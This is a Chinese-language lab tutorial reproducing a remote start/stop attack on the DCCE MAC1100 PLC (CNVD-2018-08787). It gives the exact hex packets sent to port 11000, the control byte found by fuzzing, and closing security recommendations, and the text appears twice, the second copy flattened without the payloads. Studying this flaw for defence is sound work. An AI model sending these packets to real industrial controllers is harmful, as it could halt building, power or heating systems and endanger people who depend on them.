大工PLC PLC远程启停攻击实验
字数 1061 2025-08-18 11:39:23

PLC远程启停攻击实验教学文档

一、实验背景

本实验基于大连计控(DCCE)MAC1100 PLC可编程逻辑控制器的远程控制漏洞(CNVD-2018-08787)。该PLC广泛应用于智能楼宇、电力监控、控热系统等重要工业控制场景。攻击者可通过特定网络报文远程控制PLC的启停状态,影响工业控制系统的正常运行。

二、实验准备

2.1 硬件设备

  • 大工Mac1100 PLC设备(出厂默认IP:192.168.1.181)
  • 实验用计算机(配置IP:192.168.1.182)

2.2 软件工具

  • PLC_Config软件(用于连接PLC控制器)
  • WireShark(网络流量抓取与分析)
  • 通信猫调试软件(用于发送控制报文)

三、实验步骤

3.1 网络连接配置

  1. 将PLC与实验计算机连接至同一局域网
  2. 配置计算机IP为192.168.1.182
  3. 确认PLC保持出厂默认IP(192.168.1.181)

3.2 PLC连接验证

  1. 使用PLCConfig软件连接PLC控制器
  2. 确认连接状态正常

3.3 流量捕获与分析

  1. 启动WireShark开始抓包
  2. 通过PLCConfig软件执行PLC的启动和停止操作
  3. 停止抓包并分析捕获的流量

关键流量特征:

  • 启动报文:0d00242410001d002400f82a03000000
  • 停止报文:0d00d67810001e000000f82a01000000

3.4 远程控制实施

  1. 打开通信猫调试软件
  2. 向PLC的11000端口发送启动报文: 
    0d00242410001d002400f82a03000000
  3. 观察PLC状态变为"Run"
  4. 发送停止报文: 
    0d00d67810001e000000f82a01000000
  5. 观察PLC状态变为"Stop"

四、流量分析与Fuzzing测试

通过对多组启停流量的对比分析,发现控制PLC启停的关键字段:

0d005454100006002400f82a0?000000

其中?位置决定PLC状态:

  • 3:启动PLC
  • 1:停止PLC

测试数据样本:

run :0d005454100006002400f82a03000000
stop:0d0007c2100007000000f82a01000000
run :0d00e58e100001002400f82a03000000
stop:0d0017d2100002000000f82a01000000
...

五、安全建议

  1. 网络隔离:将PLC设备置于独立的控制网络,限制外部访问
  2. 访问控制:配置防火墙规则,限制对PLC端口的访问
  3. 固件升级:及时更新PLC固件,修复已知漏洞
  4. 流量监控:部署工业网络流量监测系统,检测异常控制指令
  5. 物理安全:确保PLC设备的物理访问安全

六、实验总结

本实验成功复现了针对大工Mac1100 PLC的远程启停攻击,验证了该型号PLC存在的安全漏洞。通过分析控制报文,确定了控制PLC状态的关键字段。工业控制系统安全需要从网络、设备、管理等多层面进行防护,防止此类攻击影响工业生产安全。

注:本实验仅用于安全研究目的,未经授权对他人设备实施此类攻击属于违法行为。

PLC远程启停攻击实验教学文档 一、实验背景 本实验基于大连计控(DCCE)MAC1100 PLC可编程逻辑控制器的远程控制漏洞(CNVD-2018-08787)。该PLC广泛应用于智能楼宇、电力监控、控热系统等重要工业控制场景。攻击者可通过特定网络报文远程控制PLC的启停状态,影响工业控制系统的正常运行。 二、实验准备 2.1 硬件设备 大工Mac1100 PLC设备(出厂默认IP:192.168.1.181) 实验用计算机(配置IP:192.168.1.182) 2.2 软件工具 PLC_ Config软件(用于连接PLC控制器) WireShark(网络流量抓取与分析) 通信猫调试软件(用于发送控制报文) 三、实验步骤 3.1 网络连接配置 将PLC与实验计算机连接至同一局域网 配置计算机IP为192.168.1.182 确认PLC保持出厂默认IP(192.168.1.181) 3.2 PLC连接验证 使用PLCConfig软件连接PLC控制器 确认连接状态正常 3.3 流量捕获与分析 启动WireShark开始抓包 通过PLCConfig软件执行PLC的启动和停止操作 停止抓包并分析捕获的流量 关键流量特征: 启动报文: 0d00242410001d002400f82a03000000 停止报文: 0d00d67810001e000000f82a01000000 3.4 远程控制实施 打开通信猫调试软件 向PLC的11000端口发送启动报文: 观察PLC状态变为"Run" 发送停止报文: 观察PLC状态变为"Stop" 四、流量分析与Fuzzing测试 通过对多组启停流量的对比分析,发现控制PLC启停的关键字段: 其中 ? 位置决定PLC状态: 3 :启动PLC 1 :停止PLC 测试数据样本: 五、安全建议 网络隔离 :将PLC设备置于独立的控制网络,限制外部访问 访问控制 :配置防火墙规则,限制对PLC端口的访问 固件升级 :及时更新PLC固件,修复已知漏洞 流量监控 :部署工业网络流量监测系统,检测异常控制指令 物理安全 :确保PLC设备的物理访问安全 六、实验总结 本实验成功复现了针对大工Mac1100 PLC的远程启停攻击,验证了该型号PLC存在的安全漏洞。通过分析控制报文,确定了控制PLC状态的关键字段。工业控制系统安全需要从网络、设备、管理等多层面进行防护,防止此类攻击影响工业生产安全。 注:本实验仅用于安全研究目的,未经授权对他人设备实施此类攻击属于违法行为。